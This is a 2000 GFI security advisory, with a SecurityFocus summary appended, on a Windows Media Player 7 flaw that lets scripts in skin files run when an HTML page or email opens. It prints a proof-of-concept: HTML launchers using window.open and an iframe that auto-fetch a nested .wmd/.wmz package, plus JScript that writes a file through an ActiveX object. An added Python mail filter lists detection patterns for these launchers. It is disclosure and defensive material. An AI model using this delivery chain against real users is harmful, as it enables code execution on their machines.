----[Title:

[ GFISEC23112000 ] Microsoft Media Player 7 allows execution of Arbitrary Code

----[Published:

23.NOV.2000

----[Vendor Status:

Microsoft has been informed and we have worked with them to release a patch.

----[Systems Affected:

Windows ME (WMP7 is installed by default) and 95, 98, NT and 2000, using:

 * Windows Media Player 7

and

 * Internet Explorer 3+,
 * Outlook Express 2000,
 * Outlook Express 98,
 * Outlook 2000,
 * Outlook 98
 * possibly all other HTML and/or javascript enabled e-mail clients.

----[The problem:

GFI, developer of email content checking & network security software, has recently discovered a security flaw within Windows Media Player which allows a malicious user to run arbitrary code on a target machine as it attempts to view a website or an HTML E-mail.

The problem is exploited by embedding a javascript (.js) file within a Media Player skin file (.wmz), which can in turn be embedded in a Windows Media Download file (.wmd). This does not require the user to run any attachments, since the Media Player file is automatically opened using an iframe tag or a window.open() call within a <script> tag.

----[Proof of concept Exploit:

<Embedded within an HTML file or e-mail>

E-mail Example 1.

<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  alert('This exploit will now open a new window\nand automatically download the wmd file\nand execute it. This will create a file named\ngfiseclab.txt in your C:\\');
  window.open(theURL,winName,features);
}
//-->
</script>
</head>

<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</body>
</Embedded within an HTML e-mail>


E-mail Example 2.

<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download the wmd file \n and execute it. This will create a file named \n gfiseclab.txt in your C:\\')
</script>
<iframe src="http://website/test.wmd"></iframe>
</body>
</html>

-------------------------------------

test.wmd is a compressed zip file which contains the following files:

 * test.asx: meta file which points to an mpg file and the exploit skin file
 * test.mpg: an example mpeg movie.
 * test.wmz: the exploit skin file.

test.wmz is also a compressed zip file containing:

 * test.js: our javascript which contains the following code

************************************
// Scripting.FileSystemObject is the ActiveX component reachable from the
// skin script; creating C:\gfiseclab.txt is the proof that arbitrary code ran.
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);

// Skin event handler. playAgain() is not defined in this listing; the file is
// already created by the top-level statements above when the script loads.
function onload(){
  playAgain();
}
************************************

 * test.wms: another metafile which calls test.js

-------------------------------------

----[Solution:

For e-mail the best solution is to apply filtering on incoming e-mails at the SMTP server: filter WMD and WMZ files, and disable javascript, iframe tags, meta refresh tags and possibly ActiveX tags. This means that users should not need to worry about receiving malicious email and spreading worms etc.

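The following is an added example, not code from the GFI advisory, showing what the SMTP-side filter described above has to look at. It handles both halves of the problem: the nested package layout from the previous section (a .wmd zip carrying a .wmz zip that carries the .wms skin definition and its .js), detected by content rather than by file name, and the HTML launchers (iframe, meta refresh, object/ActiveX, window.open(), script). All function names, the sample message and the stand-in package it builds (placeholder contents only) are assumptions constructed here for the demonstration.

```python
"""Mail content filter of the kind the advisory's Solution section describes.
Added example, not part of the GFI advisory. The package and message built
at the bottom are constructed stand-ins, not the advisory's test.wmd."""
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

ZIP_MAGIC = b"PK\x03\x04"            # local file header of a non-empty zip
RISKY_EXT = (".wmd", ".wmz")         # Media Player download / skin packages
SKIN_SCRIPT_EXT = (".wms", ".js")    # skin definition and the script it loads

# HTML constructs the advisory lists as automatic launchers.
HTML_LAUNCHERS = [
    ("iframe", re.compile(r"<\s*iframe\b", re.I)),
    ("meta refresh", re.compile(r"<\s*meta\b[^>]*http-equiv\s*=\s*[\"']?refresh", re.I)),
    ("object/activex", re.compile(r"<\s*(object|embed)\b", re.I)),
    ("window.open", re.compile(r"window\s*\.\s*open\s*\(", re.I)),
    ("script", re.compile(r"<\s*script\b", re.I)),
]


def zip_members(blob, depth=0, max_depth=3):
    """Yield (member_name, depth) for a zip and for zips nested inside it.
    A .wmd is a zip that carries a .wmz, itself a zip holding the .wms skin
    definition and any .js it references, so one level of recursion is the
    normal case; max_depth bounds zip-bomb style nesting."""
    if not blob.startswith(ZIP_MAGIC) or depth > max_depth:
        return
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                yield info.filename, depth
                inner = zf.read(info.filename)
                if inner.startswith(ZIP_MAGIC):
                    yield from zip_members(inner, depth + 1, max_depth)
    except zipfile.BadZipFile:
        return


def scan_attachment(filename, blob):
    """Return the reasons to block one attachment (empty list = clean).
    The name check catches honest .wmd/.wmz; the content walk catches the
    same package renamed to something innocuous."""
    reasons = []
    if (filename or "").lower().endswith(RISKY_EXT):
        reasons.append(f"attachment name {filename!r} has a Media Player package extension")
    for member, depth in zip_members(blob):
        if member.lower().endswith(SKIN_SCRIPT_EXT):
            reasons.append(f"zip member {member!r} (nesting depth {depth}) is a skin script file")
    return reasons


def scan_html(html):
    """Return the labels of launcher constructs present in an HTML body."""
    return [label for label, rx in HTML_LAUNCHERS if rx.search(html)]


def scan_message(msg):
    """Collect all findings for a parsed EmailMessage (attachments + HTML)."""
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        if part.get_content_type() == "text/html":
            findings.extend(f"html body uses {label}" for label in scan_html(part.get_content()))
        elif part.get_filename():
            findings.extend(scan_attachment(part.get_filename(), part.get_payload(decode=True)))
    return findings


def build_sample_package():
    """Constructed stand-in with the layout the advisory lists for test.wmd:
    test.asx + test.mpg + test.wmz, where test.wmz holds test.wms + test.js.
    Member contents are placeholders, not the advisory's payload."""
    wmz = io.BytesIO()
    with zipfile.ZipFile(wmz, "w") as zf:
        zf.writestr("test.wms", "<THEME><VIEW/></THEME>")
        zf.writestr("test.js", "// placeholder script")
    wmd = io.BytesIO()
    with zipfile.ZipFile(wmd, "w") as zf:
        zf.writestr("test.asx", '<ASX version="3.0"/>')
        zf.writestr("test.mpg", b"\x00" * 16)
        zf.writestr("test.wmz", wmz.getvalue())
    return wmd.getvalue()


def build_sample_message(attachment_name="movie.bin"):
    """Constructed HTML mail: an iframe launcher plus the package attached
    under a harmless-looking name, so a name-only filter would miss it."""
    msg = EmailMessage(policy=policy.default)
    msg["Subject"] = "sample"
    msg.set_content("plain text fallback")
    msg.add_alternative('<html><body><iframe src="http://website/test.wmd"></iframe></body></html>',
                        subtype="html")
    msg.add_attachment(build_sample_package(), maintype="application",
                       subtype="octet-stream", filename=attachment_name)
    return msg


if __name__ == "__main__":
    for finding in scan_message(build_sample_message()):
        print("BLOCK:", finding)
```

Run stand-alone it prints three block reasons for the constructed message: the iframe in the HTML body and the test.wms and test.js members found one zip level down inside the renamed attachment. The content walk is the part worth keeping: an attachment called movie.bin passes an extension filter, but the nested zip still contains the skin definition and script that Media Player would run.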
Consider unregistering .wmd and .wmz from being associated with Media Player 7 until the vendor patch is applied. Procedure:

In Windows Explorer click on View>Options>File Types and delete the following entries:

 * Windows Media Player Skin Package.
 * Windows Media Player Download Package.

This should provide some better protection.

----[Reference:

http://www.gfi.com/press/memp7exploitpr.htm
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp

----[Contact Information:

Sandro Gauci
GFI Security Lab
sandro@xxxxxxx
http://www.gfi.com


source: https://www.securityfocus.com/bid/1976/info

Windows Media Player is an application used for digital audio and video content viewing.

It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the ActiveX component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.

Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.